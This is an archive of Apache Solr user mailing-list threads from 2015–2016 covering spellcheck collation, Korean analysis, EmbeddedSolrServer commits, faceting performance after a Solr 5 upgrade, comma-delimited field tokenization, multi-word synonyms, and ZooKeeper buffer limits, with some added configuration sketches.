> >> > If these do not prove helpful, it looks like I will need to wait for
> >> > SOLR-8096 to be resolved before upgrading.
> >> >
> >> > Thanks also for your comment on top_fc for the CollapsingQParser.  I
> use
> >> > collapse/expand for some queries but traditional grouping for others
> >> due to
> >> > performance.  It will be interesting to see if those grouping queries
> >> > perform better now using CollapsingQParser with top_fc.
> >> >
> >> > On Wed, May 18, 2016 at 11:39 AM, Joel Bernstein <joels...@gmail.com>
> >> > wrote:

Re: Solr 4.3.1 - Spell-Checker with MULTI-WORD PHRASE

2016-07-22 Thread SRINI SOLR
Hi all - please help me here

On Thursday, July 21, 2016, SRINI SOLR <srini.s...@gmail.com> wrote:
> Hi All -
> Could you please help me on spell check on multi-word phrase as a whole...
> Scenario -
> I have a problem with solr spellcheck suggestions for multi word phrases.
With the query for 'red chillies'
>
>
q=red+chillies&wt=xml&spellcheck=true&spellcheck.collate=true&spellcheck.extendedResults=true&spellcheck.onlyMorePopular=true
>
> I get
>
> <lst name="spellcheck">
>   <lst name="suggestions">
>     <lst name="chillies">
>       <int name="numFound">2</int>
>       <int name="startOffset">4</int>
>       <int name="endOffset">12</int>
>       <int name="origFreq">0</int>
>       <arr name="suggestion">
>         <lst><str name="word">chiller</str><int name="freq">4</int></lst>
>         <lst><str name="word">challis</str><int name="freq">2</int></lst>
>       </arr>
>     </lst>
>     <bool name="correctlySpelled">false</bool>
>     <str name="collation">red chiller</str>
>   </lst>
> </lst>
>
> The problem is, even though 'chiller' has 4 results in the index, 'red
chiller' has none. So we end up suggesting a phrase with 0 results.
>
> What can I do to make spellcheck work on the whole phrase only?
>
> Please help me here ...


Solr 4.3.1 - Spell-Checker with MULTI-WORD PHRASE

2016-07-21 Thread SRINI SOLR
Hi All -
Could you please help me on spell check on multi-word phrase as a whole...

Scenario -
I have a problem with solr spellcheck suggestions for multi word phrases.
With the query for 'red chillies'

q=red+chillies&wt=xml&spellcheck=true&spellcheck.collate=true&spellcheck.extendedResults=true&spellcheck.onlyMorePopular=true

I get


  
<lst name="spellcheck">
  <lst name="suggestions">
    <lst name="chillies">
      <int name="numFound">2</int>
      <int name="startOffset">4</int>
      <int name="endOffset">12</int>
      <int name="origFreq">0</int>
      <arr name="suggestion">
        <lst><str name="word">chiller</str><int name="freq">4</int></lst>
        <lst><str name="word">challis</str><int name="freq">2</int></lst>
      </arr>
    </lst>
    <bool name="correctlySpelled">false</bool>
    <str name="collation">red chiller</str>
  </lst>
</lst>

The problem is, even though 'chiller' has 4 results in the index, 'red chiller'
has none. So we end up suggesting a phrase with 0 results.

What can I do to make spellcheck work on the whole phrase only?



Please help me here ...
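
One technique worth trying here (a suggestion, not something confirmed in
this thread) is collation verification, which makes Solr test each suggested
phrase against the index and drop collations that return no hits:

spellcheck.collate=true
spellcheck.maxCollationTries=5
spellcheck.collateExtendedResults=true

With maxCollationTries greater than 0, a collation such as 'red chiller' is
re-run as a query and discarded when it yields 0 results.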


Recommendations for analyzing Korean?

2016-06-14 Thread Solr List
Hi -

What's the current recommendation for searching/analyzing Korean?

The reference guide only lists CJK:
https://cwiki.apache.org/confluence/display/solr/Language+Analysis
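
For context, the CJK support the reference guide lists is bigram-based; a
minimal sketch of such a field type (names illustrative):

<fieldType name="text_cjk" class="solr.TextField" positionIncrementGap="100">
  <analyzer>
    <tokenizer class="solr.StandardTokenizerFactory"/>
    <filter class="solr.CJKWidthFilterFactory"/>
    <filter class="solr.LowerCaseFilterFactory"/>
    <filter class="solr.CJKBigramFilterFactory"/>
  </analyzer>
</fieldType>

It indexes Korean as overlapping bigrams rather than dictionary words, which
is what the morphological analyzers discussed below aim to improve on.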

I see a bunch of work was done on
https://issues.apache.org/jira/browse/LUCENE-4956, but it doesn't look like
that was ever committed - and the last comment was years ago.

There seem to be a few versions of this in the wild, both more recent:
https://github.com/juncon/arirang.lucene-analyzer-5.0.0, and the original:
https://sourceforge.net/projects/lucenekorean/ but I'm not sure what's the
canonical source at this point.

I also see this: https://bitbucket.org/eunjeon/mecab-ko-lucene-analyzer

Suggestions?

Thanks,

Tom


Re: Solr 4.3.1 - Does not load the new data using the Java application

2016-06-09 Thread SRINI SOLR
Hi Upayavira / Team -
Can you please explain in detail how to do the commit?

If we do the commit, will the new data be available to the Java
application without calling *embeddedSolrServer.getCoreContainer().load()*
again?

Please help me here ...

Thanks in Advance.
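
For reference, a minimal SolrJ sketch of the commit being asked about,
assuming the same embeddedSolrServer instance (in 4.3.1 EmbeddedSolrServer
is a SolrServer, so the usual add/commit calls apply):

SolrInputDocument doc = new SolrInputDocument();
doc.addField("id", "doc-1"); // hypothetical uniqueKey field
embeddedSolrServer.add(doc);
// Hard commit: flushes pending updates and opens a new searcher,
// making the new data visible without reloading the core container.
embeddedSolrServer.commit();

After the commit, queries through the same instance see the new documents;
no further getCoreContainer().load() call is needed.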








On Thu, Jun 9, 2016 at 4:08 PM, Upayavira <u...@odoko.co.uk> wrote:

> Are you executing a commit?
>
> You must commit before your content becomes visible.
>
> Upayavira
>
> On Thu, 9 Jun 2016, at 11:13 AM, SRINI SOLR wrote:
> > Hi Team -
> > Can you please help me out on the below issue ...
> >
> > We are using the Solr 4.3.1 version.
> >
> > Integrated Solr 4.3.1 with Java application using EmbeddedSolrServer.
> >
> > Using this EmbeddedSolrServer in java -  loading the core container as
> > below ...
> > *embeddedSolrServer.getCoreContainer().load();*
> >
> > We are loading the container at the time of initiating the
> > ApplicationContext. And now Java application is able to access the
> > indexed
> > data.
> >
> > *Now the issue is  - *
> > *If I index new data in Solr, it is not visible to the Java
> > application unless I load the core container again using
> > **embeddedSolrServer.getCoreContainer().load().*
> >
> > Can you please help me out on how to access the new data (which is
> > indexed in Solr) from the Java application without calling
> > *embeddedSolrServer.getCoreContainer().load()* every time?
> >
> > *??? *
> >
> > *Please help me out ... I am stuck and not able to proceed further ... It
> > is leading to critical issue ...*
> >
> > *Thanks In Advance.*
>


Solr 4.3.1 - Does not load the new data using the Java application

2016-06-09 Thread SRINI SOLR
Hi Team -
Can you please help me out on the below issue ...

We are using the Solr 4.3.1 version.

Integrated Solr 4.3.1 with Java application using EmbeddedSolrServer.

Using this EmbeddedSolrServer in java -  loading the core container as
below ...
*embeddedSolrServer.getCoreContainer().load();*

We are loading the container at the time of initiating the
ApplicationContext. And now Java application is able to access the indexed
data.

*Now the issue is  - *
*If I index new data in Solr, it is not visible to the Java
application unless I load the core container again using
**embeddedSolrServer.getCoreContainer().load().*

Can you please help me out on how to access the new data (which is
indexed in Solr) from the Java application without calling
*embeddedSolrServer.getCoreContainer().load()* every time?

*??? *

*Please help me out ... I am stuck and not able to proceed further ... It
is leading to critical issue ...*

*Thanks In Advance.*


Re: Indexing a (File attached to a document)

2016-05-24 Thread Solr User
Hi,
I am using the MapReduceIndexerTool to index data from HDFS, using morphlines
as the ETL tool.

The data paths are specified as XPaths in the morphline file.

Sorry for the delay.





Re: Faceting and Grouping Performance Degradation in Solr 5

2016-05-18 Thread Solr User
Joel,

Thank you for taking the time to respond to my question.  I tried the JSON
Facet API for one query that uses facet.method=enum (since this one has a
ton of unique values and performed better with enum) but this was way
slower than even the slower Solr 5 times.  I did not try the new API with
the non-enum queries though so I will give that a go.  It looks like Solr
5.5.1 also has a facet.method=uif which will be interesting to try.

If these do not prove helpful, it looks like I will need to wait for
SOLR-8096 to be resolved before upgrading.

Thanks also for your comment on top_fc for the CollapsingQParser.  I use
collapse/expand for some queries but traditional grouping for others due to
performance.  It will be interesting to see if those grouping queries
perform better now using CollapsingQParser with top_fc.
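
For reference, the top_fc hint is passed inside the collapse filter query
itself; a sketch with a hypothetical group field:

q=some+query&fq={!collapse field=groupId hint=top_fc}&expand=true

The hint keeps the collapse field in the top-level FieldCache, trading
warming time and memory for per-query speed, as Joel describes below.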

On Wed, May 18, 2016 at 11:39 AM, Joel Bernstein <joels...@gmail.com> wrote:

> Yes, SOLR-8096 is the issue here.
>
> I don't believe indexing with docValues is going to help too much with
> this. The enum slowness may not be related, but I'm not positive about
> that.
>
> The major slowdowns are likely due to the removal of the top level
> FieldCache from general use and the removal of the FieldValuesCache which
> was used for multi-value field faceting.
>
> The JSON facet API covers all the functionality in the traditional
> faceting, and it has been developed to be very performant.
>
> You may also want to see if Collapse/Expand can meet your applications
> needs rather Grouping. It allows you to specify using a top level
> FieldCache if performance is a blocker without it.
>
>
>
>
> Joel Bernstein
> http://joelsolr.blogspot.com/
>
> On Wed, May 18, 2016 at 10:42 AM, Solr User <solr...@gmail.com> wrote:
>
> > Does anyone know the answer to this?
> >
> > On Wed, May 4, 2016 at 2:19 PM, Solr User <solr...@gmail.com> wrote:
> >
> > > I recently was attempting to upgrade from Solr 4.8.1 to Solr 5.4.1 but
> > had
> > > to abort due to average response times degraded from a baseline volume
> > > performance test.  The affected queries involved faceting (both enum
> > method
> > > and default) and grouping.  There is a critical bug
> > > https://issues.apache.org/jira/browse/SOLR-8096 currently open which I
> > > gather is the cause of the slower response times.  One concern I have
> is
> > > that discussions around the issue offer the suggestion of indexing with
> > > docValues which alleviated the problem in at least that one reported
> > case.
> > > However, indexing with docValues did not improve the performance in my
> > case.
> > >
> > > Can someone please confirm or correct my understanding that this issue
> > has
> > > no path forward at this time and specifically that it is already known
> > that
> > > docValues does not necessarily solve this?
> > >
> > > Thanks in advance!
> > >
> > >
> > >
> >
>
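
For readers unfamiliar with the JSON Facet API mentioned above, a minimal
terms facet looks like this sketch (collection and field names hypothetical):

curl http://localhost:8983/solr/collection1/query -d '
{
  "query": "*:*",
  "facet": {
    "top_brands": { "type": "terms", "field": "brand", "limit": 10 }
  }
}'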


Re: Faceting and Grouping Performance Degradation in Solr 5

2016-05-18 Thread Solr User
Does anyone know the answer to this?

On Wed, May 4, 2016 at 2:19 PM, Solr User <solr...@gmail.com> wrote:

> I recently was attempting to upgrade from Solr 4.8.1 to Solr 5.4.1 but had
> to abort due to average response times degraded from a baseline volume
> performance test.  The affected queries involved faceting (both enum method
> and default) and grouping.  There is a critical bug
> https://issues.apache.org/jira/browse/SOLR-8096 currently open which I
> gather is the cause of the slower response times.  One concern I have is
> that discussions around the issue offer the suggestion of indexing with
> docValues which alleviated the problem in at least that one reported case.
> However, indexing with docValues did not improve the performance in my case.
>
> Can someone please confirm or correct my understanding that this issue has
> no path forward at this time and specifically that it is already known that
> docValues does not necessarily solve this?
>
> Thanks in advance!
>
>
>


Re: Filter query (fq) on comma-separated value does not work

2016-05-16 Thread SRINI SOLR
Hi Ahmet / Team -
Thanks for your quick response...

Can you please help me out on this PatternTokenizer configuration...
Here we are using configuration as below ...

















And also - I have made changes to the field value so that it is separated
by space instead of commas and indexed the data as such... And now I was
able to retrieve the expected results.

But still, can you help me out in achieving the results using the comma,
as you suggested?

Thanks & Regards

On Mon, May 16, 2016 at 5:50 PM, Ahmet Arslan <iori...@yahoo.com.invalid>
wrote:

> Hi,
>
> Its all about how you tokenize the category field.
> It looks like you are using a string type, which does not tokenize at all
> (e.g. verbatim)
> Please use a PatternTokenizer and configure it so that it splits on comma.
>
> Ahmet
>
>
>
> On Monday, May 16, 2016 2:11 PM, SRINI SOLR <srini.s...@gmail.com> wrote:
> Hi Team -
> Can you please help me out on the following ...
>
> I have a field in the Solr document which has comma-separated
> values like below:
>
> 1,456,768,345  doc1
> 456 doc2
> 1,456  doc3
>
> So here I need to filter for the docs whose category contains 456.
> When I query like the following:
>
> fq=category:456
>
> it returns only one document, doc2, whose category is exactly 456.
>
> But I need the other two docs, which also contain category 456.
>
> Can you please help me out to achieve this ...
>
>
> Thanks & Regards
>
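
A sketch of what Ahmet suggests (type and field names illustrative):

<fieldType name="commaDelimited" class="solr.TextField">
  <analyzer>
    <tokenizer class="solr.PatternTokenizerFactory" pattern="\s*,\s*"/>
  </analyzer>
</fieldType>
<field name="category" type="commaDelimited" indexed="true" stored="true"/>

With this in place (and after reindexing), '1,456,768,345' is indexed as the
separate tokens 1, 456, 768 and 345, so fq=category:456 matches all three
documents.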


Filter query (fq) on comma-separated value does not work

2016-05-16 Thread SRINI SOLR
Hi Team -
Can you please help me out on the following ...

I have a field in the Solr document which has comma-separated
values like below:

1,456,768,345  doc1
456 doc2
1,456  doc3

So here I need to filter for the docs whose category contains 456.
When I query like the following:

fq=category:456

it returns only one document, doc2, whose category is exactly 456.

But I need the other two docs, which also contain category 456.

Can you please help me out to achieve this ...


Thanks & Regards


Indexing a (File attached to a document)

2016-05-12 Thread Solr User
Hi

If I index a document with a file attachment attached to it in solr, can I
visualise data of that attached file attachment also while querying that
particular document? Please help me on this


Thanks & Regards
Vidya Nadella





Multi-word Synonyms Solr 4.3.1 does not work

2016-05-06 Thread SRINI SOLR
Hi All -
Can you please help me out on the multi-word synonyms with Solr 4.3.1.

I am using the synonyms as below 

test1,test2 => movie1 cinema,movie2 cinema,movie3 cinema

The above syntax works as expected: if I search for words like test1 or
test2, the right-hand-side multi-word values are matched.

But -

I have a synonyms like below - multi-word on both the side left-hand and
right-hand...

test1 test, test2 test, test3 test =>movie1 cinema,movie2 cinema,movie3
cinema

With multi-word entries on the left-hand side as above, matching does not
work as expected.

Below is the configuration I am using in the query analyzer ...




Please Help me 
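
For context, and as general Solr 4.x behavior rather than anything confirmed
in this thread: multi-word synonyms on the query side are a long-standing
limitation, because the query parser splits the input on whitespace before
the analyzer runs, so a left-hand entry like 'test1 test' never reaches the
SynonymFilter as one unit. The common workaround is index-time expansion,
roughly:

<analyzer type="index">
  <tokenizer class="solr.StandardTokenizerFactory"/>
  <filter class="solr.SynonymFilterFactory" synonyms="synonyms.txt"
          ignoreCase="true" expand="true"/>
</analyzer>

with the synonym rules removed from the query analyzer, at the cost of a
reindex whenever synonyms.txt changes.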


Faceting and Grouping Performance Degradation in Solr 5

2016-05-04 Thread Solr User
I recently was attempting to upgrade from Solr 4.8.1 to Solr 5.4.1 but had
to abort due to average response times degraded from a baseline volume
performance test.  The affected queries involved faceting (both enum method
and default) and grouping.  There is a critical bug
https://issues.apache.org/jira/browse/SOLR-8096 currently open which I
gather is the cause of the slower response times.  One concern I have is
that discussions around the issue offer the suggestion of indexing with
docValues which alleviated the problem in at least that one reported case.
However, indexing with docValues did not improve the performance in my case.

Can someone please confirm or correct my understanding that this issue has
no path forward at this time and specifically that it is already known that
docValues does not necessarily solve this?

Thanks in advance!


EmbeddedSolrServer Loading Core Containers Solr 4.3.1

2016-05-02 Thread SRINI SOLR
Hi Team -
I am using Solr 4.3.1.

We are using this EmbeddedSolrServer to load Core Containers in one of the
java application.

This is setup as a cron job for every 1 hour to load the new data on to the
containers.

Otherwise - the new data is not getting loaded on the containers , if we
access from Java application even after re-indexing also.

Please help here to resolve the issue ...?


want to subscribe

2016-04-18 Thread SRINI SOLR



Re: Solr 4.7.2 Vs 5.3.0 Docs different for same query

2015-10-02 Thread Ravi Solr
Mr. Uchida,
Thank you for responding. It was my fault: I had an update processor
which takes specific text and string fields and concatenates them into a
single field, and I search on that single field. Recently I used Atomic
update to fix a specific field's value and forgot to disable the
UpdateProcessor chain...Since I was only updating one field the aggregate
field got messed up with just that field value and hence I had issues
searching. I reindexed the data again yesterday night and now it is all
good.

I do have a small question, when we update the zookeeper ensemble with new
configs via 'upconfig' and 'linkconfig' commands do we have to "reload" the
collections on all the nodes to see the updated config ?? Is there a single
call which can update all nodes connected to the ensemble ?? I just went to
the admin UI and hit "Reload" button manually on each of the node...Is that
the correct way to do it ?

Thanks

Ravi Kiran Bhaskar

On Fri, Oct 2, 2015 at 12:04 AM, Tomoko Uchida <tomoko.uchida.1...@gmail.com
> wrote:

> Are you sure that you've indexed same data to Solr 4.7.2 and 5.3.0 ?
> If so, I suspect that you have multiple shards and request to one shard.
> (In that case, you might get partial results)
>
> Can you share HTTP request url and the schema and default search field ?
>
>
> 2015-10-02 6:09 GMT+09:00 Ravi Solr <ravis...@gmail.com>:
>
> > We migrated from 4.7.2 to 5.3.0. I sourced the docs from the 4.7.2 core and
> > indexed into 5.3.0 collection (data directories are different) via
> > SolrEntityProcessor. Currently my production is all whack because of this
> > issue. Do I have to go back and reindex all again ?? Is there a quick fix
> > for this ?
> >
> > Here are the results for the query 'obama'...please note the numfound.
> > 4.7.2 finds almost 148519 docs while 5.3.0 reports far fewer. Any
> > pointers on how to correct this ?
> >
> >
> > Solr 4.7.2
> >
> > <response>
> >   <lst name="responseHeader">
> >     <int name="status">0</int>
> >     <int name="QTime">2</int>
> >     <lst name="params">
> >       <str name="q">obama</str>
> >       <str name="rows">0</str>
> >     </lst>
> >   </lst>
> >   <result name="response" numFound="148519" start="0"/>
> > </response>
> >
> > SolrCloud 5.3.0
> >
> > <response>
> >   <lst name="responseHeader">
> >     <int name="status">0</int>
> >     <int name="QTime">2</int>
> >     <lst name="params">
> >       <str name="q">obama</str>
> >       <str name="rows">0</str>
> >     </lst>
> >   </lst>
> >   <result name="response" numFound="..." start="0"/>
> > </response>
> >
> >
> > Thanks
> >
> > Ravi Kiran Bhaskar
> >
>


Re: Zk and Solr Cloud

2015-10-02 Thread Ravi Solr
Awesome nugget Shawn, I also faced similar issue a while ago while i was
doing a full re-index. It would be great if such tips are added into FAQ
type documentation on cwiki. I love the SOLR forum everyday I learn
something new :-)

Thanks

Ravi Kiran Bhaskar

On Fri, Oct 2, 2015 at 1:58 AM, Shawn Heisey <apa...@elyograg.org> wrote:

> On 10/1/2015 1:26 PM, Rallavagu wrote:
> > Solr 4.6.1 single shard with 4 nodes. Zookeeper 3.4.5 ensemble of 3.
> >
> > See following errors in ZK and Solr and they are connected.
> >
> > When I see the following error in Zookeeper,
> >
> > unexpected error, closing socket connection and attempting reconnect
> > java.io.IOException: Packet len11823809 is out of range!
>
> This is usually caused by the overseer queue (stored in zookeeper)
> becoming extraordinarily huge, because it's being flooded with work
> entries far faster than the overseer can process them.  This causes the
> znode where the queue is stored to become larger than the maximum size
> for a znode, which defaults to about 1MB.  In this case (reading your
> log message that says len11823809), something in zookeeper has gotten to
> be 11MB in size, so the zookeeper client cannot read it.
>
> I think the zookeeper server code must be handling the addition of
> children to the queue znode through a code path that doesn't pay
> attention to the maximum buffer size, just goes ahead and adds it,
> probably by simply appending data.  I'm unfamiliar with how the ZK
> database works, so I'm guessing here.
>
> If I'm right about where the problem is, there are two workarounds to
> your immediate issue.
>
> 1) Delete all the entries in your overseer queue using a zookeeper
> client that lets you edit the DB directly.  If you haven't changed the
> cloud structure and all your servers are working, this should be safe.
>
> 2) Set the jute.maxbuffer system property on the startup commandline for
> all ZK servers and all ZK clients (Solr instances) to a size that's
> large enough to accommodate the huge znode.  In order to do the deletion
> mentioned in option 1 above,you might need to increase jute.maxbuffer on
> the servers and the client you use for the deletion.
>
> These are just workarounds.  Whatever caused the huge queue in the first
> place must be addressed.  It is frequently a performance issue.  If you
> go to the following link, you will see that jute.maxbuffer is considered
> an unsafe option:
>
> http://zookeeper.apache.org/doc/r3.3.3/zookeeperAdmin.html#Unsafe+Options
>
> In Jira issue SOLR-7191, I wrote the following in one of my comments:
>
> "The giant queue I encountered was about 85 entries, and resulted in
> a packet length of a little over 14 megabytes. If I divide 85 by 14,
> I know that I can have about 6 overseer queue entries in one znode
> before jute.maxbuffer needs to be increased."
>
> https://issues.apache.org/jira/browse/SOLR-7191?focusedCommentId=14347834
>
> Thanks,
> Shawn
>
>
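
A sketch of workaround 2; the value is illustrative and must exceed the
largest znode and be set identically on every ZK server and Solr JVM:

# ZooKeeper servers (e.g. via SERVER_JVMFLAGS read by zkServer.sh):
SERVER_JVMFLAGS="-Djute.maxbuffer=15728640"

# Solr instances (ZooKeeper clients): add to the JVM startup flags
-Djute.maxbuffer=15728640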


Re: Reverse query?

2015-10-02 Thread Ravi Solr
Hello Remi,
Iam assuming the field where you store the data is analyzed.
The field definition might help us answer your question better. If you are
using the edismax handler for your search requests, I believe you can achieve
your goal by setting "mm" to 100% and the phrase slop "ps" and query slop
"qs" parameters to zero. I think that will force exact matches.

Thanks

Ravi Kiran Bhaskar
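
Concretely, that suggestion amounts to request parameters like the following
(query text illustrative):

q="mad max"&defType=edismax&mm=100%&qs=0&ps=0

mm=100% requires every term to match, qs=0 removes slop from phrases the
user types, and ps=0 removes slop from the implicit pf phrase boost. Note
this still matches the terms anywhere in the document, just all of them.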

On Fri, Oct 2, 2015 at 9:48 AM, Andrea Roggerone <
andrearoggerone.o...@gmail.com> wrote:

> Hi Remy,
> The question is not really clear, could you explain a little bit better
> what you need? Reading your email I understand that you want to get
> documents containing all the search terms typed. For instance if you search
> for "Mad Max", you wanna get documents containing both Mad and Max. If
> that's your need, you can use a phrase query like:
>
> *"*Mad Max*"~2*
>
> where enclosing your keywords between double quotes means that you want to
> get both Mad and Max and the optional parameter ~2 is an example of *slop*.
> If you need more info you can look for *Phrase Query* in
> https://wiki.apache.org/solr/SolrRelevancyFAQ
>
> On Fri, Oct 2, 2015 at 2:33 PM, remi tassing <tassingr...@gmail.com>
> wrote:
>
> > Hi,
> > I have medium-low experience on Solr and I have a question I couldn't
> quite
> > solve yet.
> >
> > Typically we have quite short query strings (a couple of words) and the
> > search is done through a set of bigger documents. What if the logic is
> > turned a little bit around. I have a document and I need to find out what
> > strings appear in the document. A string here could be a person name
> > (including space for example) or a location...which are indexed in Solr.
> >
> > A concrete example, we take this text from wikipedia (Mad Max):
> > "*Mad Max is a 1979 Australian dystopian action film directed by George
> > Miller <https://en.wikipedia.org/wiki/George_Miller_%28director%29>.
> > Written by Miller and James McCausland from a story by Miller and
> producer
> > Byron Kennedy <https://en.wikipedia.org/wiki/Byron_Kennedy>, it tells a
> > story of societal breakdown
> > <https://en.wikipedia.org/wiki/Societal_collapse>, murder, and vengeance
> > <https://en.wikipedia.org/wiki/Revenge>. The film, starring the
> > then-little-known Mel Gibson <https://en.wikipedia.org/wiki/Mel_Gibson>,
> > was released internationally in 1980. It became a top-grossing Australian
> > film, while holding the record in the Guinness Book of Records
> > <https://en.wikipedia.org/wiki/Guinness_Book_of_Records> for decades as
> > the
> > most profitable film ever created,[1]
> > <https://en.wikipedia.org/wiki/Mad_Max_%28franchise%29#cite_note-1> and
> > has
> > been credited for further opening the global market to Australian New
> Wave
> > <https://en.wikipedia.org/wiki/Australian_New_Wave> films.*
> > <https://en.wikipedia.org/wiki/Mad_Max_%28franchise%29#cite_note-2>
> > <https://en.wikipedia.org/wiki/Mad_Max_%28franchise%29#cite_note-3>"
> >
> > I would like it to match "Mad Max" but not "Mad" or "Max" seperately, and
> > "George Miller", "global market" ...
> >
> > I've tried the keywordTokenizer but it didn't work. I suppose it's ok for
> > the index time but not query time (in this specific case)
> >
> > I had a look at Luwak but it's not what I'm looking for (
> >
> >
> http://www.flax.co.uk/blog/2013/12/06/introducing-luwak-a-library-for-high-performance-stored-queries/
> > )
> >
> > The typical name search doesn't seem to work either,
> > https://dzone.com/articles/tips-name-search-solr
> >
> > I was thinking this problem must have already be solved...or?
> >
> > Remi
> >
>


Re: Solr 4.7.2 Vs 5.3.0 Docs different for same query

2015-10-02 Thread Ravi Solr
Thank you very much Erick and Uchida. I will take a look at the URL u gave
Erick.

Thanks

Ravi Kiran Bhaskar
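
For reference, the config-update cycle discussed below, as a sketch (hosts,
paths and names illustrative):

# 1. Upload the edited config set to ZooKeeper
./zkcli.sh -zkhost zk1:2181,zk2:2181,zk3:2181 -cmd upconfig \
    -confdir ./myconf/conf -confname myconf

# 2. Reload every collection that links to that config set
curl 'http://localhost:8983/solr/admin/collections?action=RELOAD&name=mycollection'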

On Fri, Oct 2, 2015 at 12:41 PM, Tomoko Uchida <tomoko.uchida.1...@gmail.com
> wrote:

> Hi Ravi,
>
> And for minor additional information,
> you may want to look through Collections API reference guide to handle
> collections properly in SolrCloud environment. (I bookmark this page.)
> https://cwiki.apache.org/confluence/display/solr/Collections+API
> <https://cwiki.apache.org/confluence/display/solr/Collections+API>
>
> Regards,
> Tomoko
>
> 2015-10-03 1:15 GMT+09:00 Erick Erickson <erickerick...@gmail.com>:
>
> > do we have to "reload" the collections on all the nodes to see the
> > updated config ??
> > YES
> >
> > Is there a single call which can update all nodes connected to the
> > ensemble ??
> >
> > NO. I'll be a little pedantic here. When you say "ensemble", I'm not
> quite
> > sure
> > what that means and am interpreting it as "all collections registered
> with
> > ZK".
> > But see below.
> >
> > I just went to the admin UI and hit "Reload" button manually on each
> > of the node...Is that
> > the correct way to do it ?
> >
> > NO. The admin UI, "core admin" is a remnant from the old days (like
> > 3.x) where there was
> > no concept of distributed collection as a distinct entity, you had to
> > do all the things you now
> > do automatically in SolrCloud "by hand". PLEASE DO NOT USE THIS
> > EXCEPT TO VIEW A REPLICA WHEN USING SOLRCLOUD! In particular, don't try
> to
> > take any action that manipulates the core (reload, add, unload and the
> > like).
> > It'll work, but you have to know _exactly_ what you are doing. Go
> > ahead and use it for
> > viewing the current state of a replica/core, but unless you need to do
> > something that
> > you cannot do with the Collections API it's very easy to go astray.
> >
> >
> > Instead, use the "collections API". In this case, there's a call like
> >
> >
> >
> http://localhost:8983/solr/admin/collections?action=RELOAD&name=CollectionName
> >
> > that will cause all the replicas associated with the collection to be
> > reloaded. Given you
> > mentioned linkconfig, I'm guessing that you have more than one
> > collection looking at a
> > particular configset, so the pedantic bit is you'd have to issue the
> > above for each
> > collection that references that configset.
> >
> > Best,
> > Erick
> >
> > P.S. Two bits:
> > 1> actually the collections API uses the core admin calls to
> > accomplish its tasks, but
> > lots of effort went in to doing exactly the right thing
> > 2> Upayavira has been creating an updated admin UI that will treat
> > collections as
> > first-class citizens (a work in progress). You can access it in 5.x by
> > hitting
> >
> > solr_host:solr_port/solr/index.html
> >
> > Give it a whirl if you can and please provide any feedback you can, it'd
> > be much
> > appreciated.
> >
> > On Fri, Oct 2, 2015 at 7:47 AM, Ravi Solr <ravis...@gmail.com> wrote:
> > > Mr. Uchida,
> > > Thank you for responding. It was my fault, I had a update
> > processor
> > > which takes specific text and string fields and concatenates them into
> a
> > > single field, and I search on that single field. Recently I used Atomic
> > > update to fix a specific field's value and forgot to disable the
> > > UpdateProcessor chain...Since I was only updating one field the
> aggregate
> > > field got messed up with just that field value and hence I had issues
> > > searching. I reindexed the data again yesterday night and now it is all
> > > good.
> > >
> > > I do have a small question, when we update the zookeeper ensemble with
> > new
> > > configs via 'upconfig' and 'linkconfig' commands do we have to "reload"
> > the
> > > collections on all the nodes to see the updated config ?? Is there a
> > single
> > > call which can update all nodes connected to the ensemble ?? I just
> went
> > to
> > > the admin UI and hit "Reload" button manually on each of the node...Is
> > that
> > > the correct way to do it ?
> > >
> > > Thanks
> > >
> > > Ravi Kiran Bhaskar
> > >
> > > On Fri, Oct 2, 2015 at 12:04 AM, Tomoko Uchida <
> > tomoko.uchida.1...@gmail.com
> > >> 

Solr 4.7.2 Vs 5.3.0 Docs different for same query

2015-10-01 Thread Ravi Solr
We migrated from 4.7.2 to 5.3.0. I sourced the docs from the 4.7.2 core and
indexed into 5.3.0 collection (data directories are different) via
SolrEntityProcessor. Currently my production is all whack because of this
issue. Do I have to go back and reindex all again ?? Is there a quick fix
for this ?

Here are the results for the query 'obama'...please note the numfound.
4.7.2 finds almost 148519 docs while 5.3.0 reports far fewer. Any
pointers on how to correct this ?


Solr 4.7.2



<response>
  <lst name="responseHeader">
    <int name="status">0</int>
    <int name="QTime">2</int>
    <lst name="params">
      <str name="q">obama</str>
      <str name="rows">0</str>
    </lst>
  </lst>
  <result name="response" numFound="148519" start="0"/>
</response>

SolrCloud 5.3.0


  
<response>
  <lst name="responseHeader">
    <int name="status">0</int>
    <int name="QTime">2</int>
    <lst name="params">
      <str name="q">obama</str>
      <str name="rows">0</str>
    </lst>
  </lst>
  <result name="response" numFound="..." start="0"/>
</response>


Thanks

Ravi Kiran Bhaskar


Re: bulk reindexing 5.3.0 issue

2015-09-28 Thread Ravi Solr
Gili, I was constantly checking the cloud admin UI and it always stayed
green, which is why I initially overlooked sync issues... finally, when all
options dried up, I went to each node individually and queried, and that is
when I found the out-of-sync issue. The way I resolved my issue was to shut
down the leader that was not syncing properly and let another node become
the leader, then reindex all docs. Once the reindexing was done I started
the node that was causing the issue and it synced properly :-)

Thanks

Ravi Kiran Bhaskar



On Mon, Sep 28, 2015 at 10:26 AM, Gili Nachum <gilinac...@gmail.com> wrote:

> Were all of shard replica in active state (green color in admin ui) before
> starting?
> Sounds like it otherwise you won't hit the replica that is out of sync.
>
> Replicas can get out of sync, and report being in sync after a sequence of
> stop start w/o a chance to complete sync.
> See if it might have happened to you:
>
> http://mail-archives.apache.org/mod_mbox/lucene-solr-user/201412.mbox/%3CCAOOKt53XTU_e0m2ioJ-S4SfsAp8JC6m-=nybbd4g_mjh60b...@mail.gmail.com%3E
> On Sep 27, 2015 06:56, "Ravi Solr" <ravis...@gmail.com> wrote:
>
> > Erick...There is only one type of String
> > "sun.org.mozilla.javascript.internal.NativeString:" and no other
> variations
> > of that in my index, so no question of missing it. Point taken regarding
> > the CURSORMARK stuff, yes you are correct, my head so numb at this point
> > after working 3 days on this, I wasnt thinking straight.
> >
> > BTW I found the real issue, I have a total of 8 servers in the solr
> cloud.
> > The leader for this specific collection was the one that was returning 0
> > for the searches. All other 7 servers had roughly 800K docs still needing
> > the string replacement. So maybe the real issue is sync among servers.
> Just
> > to prove to myself I shutdown the solr  that was giving zero results
> (i.e.
> > all uuid strings have already been somehow devoid of spurious
> > sun.org.mozilla.javascript.internal.NativeString on that server). Now it
> > ran perfectly fine and is about to finish as last 103K are still left
> when
> > I was writing this email.
> >
> > So the real question is how can we ensure that the Sync is always
> > maintained and what to do if it ever goes out of Sync, I did see some
> Jira
> > tickets from previous 4.10.x versions where Sync was an issue. Can you
> > please point me to any doc which says how SolrCloud synchs/replicates ?
> >
> > Thanks,
> >
> > Ravi Kiran Bhaskar
> >
> > Thanks
> >
> > Rvai Kiran Bhaskar
> >
